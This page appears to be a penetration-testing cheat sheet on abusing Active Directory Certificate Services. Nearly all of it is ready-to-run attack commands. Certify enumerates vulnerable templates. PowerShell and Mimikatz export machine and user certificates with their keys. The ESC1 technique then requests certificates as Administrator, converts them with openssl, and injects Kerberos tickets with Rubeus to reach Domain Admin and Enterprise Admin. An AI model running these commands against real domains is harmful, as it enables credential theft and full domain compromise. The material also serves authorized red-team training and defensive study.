search

ADCS

hashtag
Conditions of vulnerable certificate template which can be abused

  • CA grants normal/low privileged users enrollment rights

  • Manager approval is disabled

  • Authorization signatures are not required

  • target template grants normal/low privileged users enrollment rights

Enumerating - Active Directory certificate Service (ADCS)

hashtag
Identify the ADCS service installation

Certify.exe cas

hashtag
Enumerate the templates configured

Certify.exe find

hashtag
Enumerate the vulnerable templates

Certify.exe find /vulnerable

hashtag
If the enrolleeSuppliesSubject is not not allowed for all domain users, it wont show up in vulnerable template and needs to enumerated seperately (ESC1)

Certify.exe find /enrolleeSuppliesSubject

Persistance (THEFT-4): Extracting User and Machine certificates

hashtag
List all certificates for local machine in certificate store

ls cert:\LocalMachine\My

hashtag
Export the certificate in PFX format

ls cert:\LocalMachine\My\89C1171F6810A6725A47DB8D572537D736D4FF17 | Export-PfxCertificate -FilePath C:\Users\Public\pawadmin.pfx -Password (ConvertTo-SecureString -String 'niks' -Force -AsPlainText)

hashtag
Use Mimikatz to export certificate in pfx format (default cert pass is mimikatz)

Invoke-mimikatz -Command "crypto::certificates /export" Invoke-mimikatz -Command "!crypto::certificates /systemstore:local_machine /export" cat cert.pfx | base64 -w 0 C:\AD\Tools\Rubeus.exe asktgt /user:nlamb /certificate:MNeg[...]IH0A== /password:mimikatz /nowrap /ptt

Escalation (ESC-1) : Domain User to Domain Admin and Enterprise Admin

CASE I: Domain Admin

hashtag
Request certificate for DA user using ESC1 technique, and save it as cert.pem

Certify.exe request /ca:Techcorp-DC.techcorp.local\TECHCORP-DC-CA /template:ForAdminsofPrivilegedAccessWorkstations /altname:Administrator

hashtag
Convert cert.pem to cert.pfx format

C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\AD\Tools\DA.pfx

hashtag
Request TGT using pfx cerificate and inject into memory

Rubeus.exe asktgt /user:Administrator /certificate:C:\AD\Tools\DA.pfx /password:niks /nowrap /ptt

CASE II: Enterprise Admin

hashtag
Request certificate for EA user using ESC1 technique

Certify.exe request /ca:Techcorp-DC.techcorp.local\TECHCORP-DC-CA /template:ForAdminsofPrivilegedAccessWorkstations /altname:Administrator

hashtag
Convert cert.pem to cert.pfx format

C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\AD\Tools\EA.pfx

hashtag
Request TGT using pfx cerificate and inject into memory

Rubeus.exe asktgt /user:techcorp.local\Administrator /dc:techcorp-dc.techcorp.local /certificate:C:\AD\Tools\EA.pfx /password:niks /nowrap /ptt

PreviousTrustsNextESC3

Last updated